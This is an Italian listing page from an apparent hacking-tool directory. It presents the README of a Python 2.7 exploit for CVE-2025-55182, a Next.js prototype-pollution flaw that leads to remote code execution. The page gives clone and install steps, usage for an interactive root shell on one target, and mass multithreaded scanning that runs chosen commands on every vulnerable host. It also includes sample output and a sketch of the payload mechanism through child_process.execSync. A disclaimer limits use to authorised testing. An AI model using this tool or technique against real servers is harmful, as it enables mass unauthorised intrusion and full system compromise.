Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182-React2shell — Strumento di exploit per CVE-2025-55182 – exploit in Python 2.7 per la prototype pollution di Next.js che porta a RCE | Kitploit
Strumenti/GitHubGitHub/jenderal92/cve-2025-55182-react2shell
Scanner di VulnerabilitàGenerazione di PayloadExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubjenderal92/cve-2025-55182-react2shell

CVE-2025-55182-React2shell

Strumento di exploit per CVE-2025-55182 – exploit in Python 2.7 per la prototype pollution di Next.js che porta a RCE

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
612 mesi faNon ancora revisionato

CVE-2025-55182 - React2shell

Un exploit in Python 2.7 per CVE-2025-55182 – una vulnerabilità critica di prototype pollution / RCE nelle applicazioni Next.js.
Questo strumento consente sia shell interattiva su singolo bersaglio che scansione di massa di più host con multithreading, output colorato e fallback HTTPS automatico.


🚀 Caratteristiche

  • ✅ Shell interattiva per singoli bersagli – esegue comandi di sistema arbitrari
  • ✅ Scansione di massa da un file di elenco – multithread, veloce, risultati salvati automaticamente
  • ✅ Auto‑rilevamento – URL singolo → modalità shell, file esistente → modalità scansione di massa
  • ✅ HTTPS automatico – aggiunge https:// se non viene fornito alcun protocollo
  • ✅ Scrittura file thread‑safe – salva i risultati vulnerabili in tempo reale
  • ✅ Comandi personalizzati – cambia il comando predefinito id con qualsiasi comando (whoami, ls, ecc.)
  • ✅ Nessuna dipendenza esterna – solo requests (facilmente installabile)

📋 Requisiti

  • Python 2.7 (lo strumento è scritto appositamente per Python 2.7)
  • Libreria requests – installala con:
    root@kitploit:~
    pip install requests
    

· Un terminale che supporti i colori ANSI (la maggior parte dei terminali Linux/macOS, Windows Terminal, PowerShell)

📦 Installazione

root@kitploit:~
git clone https://github.com/Jenderal92/cve-2025-55182.git
cd CVE-2025-55182
pip install requests

Rendi eseguibile lo script (opzionale):

root@kitploit:~
chmod +x CVE-2025-55182.py

🎯 Utilizzo

  1. Shell interattiva (singolo bersaglio)
root@kitploit:~
python2 CVE-2025-55182.py https://target.com

oppure senza protocollo (HTTPS viene aggiunto automaticamente):

root@kitploit:~
python2 CVE-2025-55182.py target.com

Una volta connessi e verificato che il bersaglio è vulnerabile, ottieni un prompt di shell:

root@kitploit:~
$ id
uid=0(root) gid=0(root) groups=0(root)

$ whoami
root

$ ls -la
...

Comandi integrati:

· exit / quit – chiude la shell · clear – pulisce lo schermo · help – mostra l'aiuto

  1. Scansione di massa (elenco di bersagli)

Prepara un file con un bersaglio per riga (con o senza http/https):

targets.txt

root@kitploit:~
app-site3.htface.tech
https://example.com
http://127.0.0.1:3000
vulnerable-site.org

Esegui la scansione di massa (valori predefiniti: 10 thread, comando id, output res.txt):

root@kitploit:~
python2 CVE-2025-55182.py targets.txt

Personalizza thread, comando, file di output:

root@kitploit:~
python2 CVE-2025-55182.py targets.txt 20 "whoami" results.txt

· 20 – numero di thread · whoami – comando da eseguire su ogni bersaglio vulnerabile · results.txt – file di output (vengono salvate solo le voci vulnerabili)

Esempio di output della scansione di massa:

root@kitploit:~
[INFO] Loaded 4 URLs
[INFO] Threads: 10, Command: 'id', Output: res.txt

[*] (1/4) Checking: https://site.com
[+] VULNERABLE: https://site.com
    Status: 303
    Output: uid=0(root) gid=0(root) groups=0(root)

[-] NOT VULNERABLE: https://example.com
...

Risultati salvati (res.txt):

root@kitploit:~
domain : https://site.com
cmd : uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------

🧪 Come funziona

L'exploit invia una richiesta multipart/form-data appositamente costruita a un endpoint Next.js (/login viene aggiunto se il percorso è vuoto). Sfrutta la prototype pollution (proto:then e constructor:constructor) per iniettare un prefisso dannoso che esegue un comando di sistema usando child_process.execSync().

Il server risponde con un redirect 303 contenente l'output del comando nell'header x-action-redirect (o in Location). Lo strumento estrae il risultato da /login?a=.


🛡️ Disclaimer

Questo strumento è destinato esclusivamente a scopi educativi e a test di sicurezza autorizzati. L'accesso non autorizzato a sistemi informatici è illegale. L'autore non si assume alcuna responsabilità per usi impropri o danni causati da questo software. Devi avere un'autorizzazione esplicita e scritta dal proprietario del sistema di destinazione prima di utilizzare questo exploit.

Per ulteriori dichiarazioni, puoi consultare il disclaimer sulla copertina di Jenderal92. Puoi verificarlo QUI !!!

Scarica lo strumento